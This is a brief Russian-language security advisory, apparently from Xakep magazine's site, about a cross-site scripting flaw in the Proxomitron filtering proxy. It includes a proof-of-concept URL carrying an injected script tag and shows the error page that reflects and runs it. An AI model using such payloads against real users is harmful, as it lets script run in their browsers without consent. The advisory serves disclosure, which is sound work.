Уязвимость Cross-Site Scripting в Proxomitron

Рекомендуем почитать:

Xakep #299. Sysmon

Proxomitron позволяет пользователям, использующим специальные HTML фильтры, преобразовать web-страницы на лету - изменять почти все, что они желают, ускоряя при этом загрузку web-страницы. Уязвимость защиты в программе позволяет нападавшим добавлять код JavaScript к коду HTML,
посланному отдаленным сайтом.

Если нападавшие посылают следующий URL пользователю, использующему Proxomitron в качестве прокси-сервера:

http://WWW.example.com:9999/<SCRIPT> document.write(document.domain)<//SCRIPT>

Proxomitron произведет кое-что вроде этого:

<html><head><title>The Proxomitron Reveals...</title>
...
The Proxomitron couldn't connect to...<br>
<font color=#ffff00 size=+1 >
www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>
</font><br>
The site may be busy or the web server may be down...

При этом порожденный JavaScript код будет исполнен.
Уязвимость найдена в Proxomitron Naoko-4 BetaFour.

Уязвимость Cross-Site Scripting в Proxomitron

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Как работает EDR. Подробно разбираем механизмы антивирусной защиты

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Майнеры используют уязвимости в OpenMetadata и оставляют жертвам записки

Microsoft случайно добавила Copilot в Windows Server

GPT-4 может эксплуатировать уязвимости, изучив связанные бюллетени безопасности

Cisco патчит уязвимость повышения привилегий в IMC

Стал доступен API для Stable Diffusion 3